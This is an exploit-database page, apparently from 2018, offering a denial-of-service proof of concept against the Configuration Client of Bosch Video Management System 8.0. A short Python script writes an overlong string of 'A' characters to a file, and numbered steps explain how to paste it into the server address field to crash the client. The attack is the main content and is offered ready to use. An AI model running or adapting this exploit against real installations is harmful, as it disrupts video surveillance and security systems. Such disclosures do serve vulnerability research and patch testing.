Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)



EKU-ID: 8145 CVE: OSVDB-ID:
Author: Daniel Published: 2018-11-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)
# Discovery by: Daniel
# Discovery Date: 2018-11-12
# Software Name: Bosch Video Management System
# Software Version: 8.0
# Vendor Homepage: https://www.boschsecurity.com/xc/en/products/management-software/bvms/
# Software Link: https://la.boschsecurity.com/es/productos/videosystems_1/videosoftware_1/videomanagementsystems_1/boschvideomanagementsyste_8/boschvideomanagementsyste_8_44761
# Tested on: Windows 10 Pro x64
 
#Make sure that during the installation of software you installed all the program features available.
#This PoC was carried out in 'Configuration Client', which is part of 'Bosch Video Management System'.
 
# Steps to produce the crash:
# 1.- run: dos.py
# 2.- Open bosch.txt and copy content to clipboard
# 2.- Open Configuration Client (Normally the installer creates a direct link in desktop)
# 3.- Click on 'Connection:' box and select "Address Book"
# 4.- Copy clipboard in "(Enterprise) Management Server Address:"
# 5.- write "test" in 'Username'
# 6.- Write "test" in 'Password'
# 7.- Click on 'OK'
# 8.- Crash
 
 
#!/usr/bin/python
 
buf = "\x41" * 64
f = open('bosch.txt', 'w')
f.write(buf)
f.close()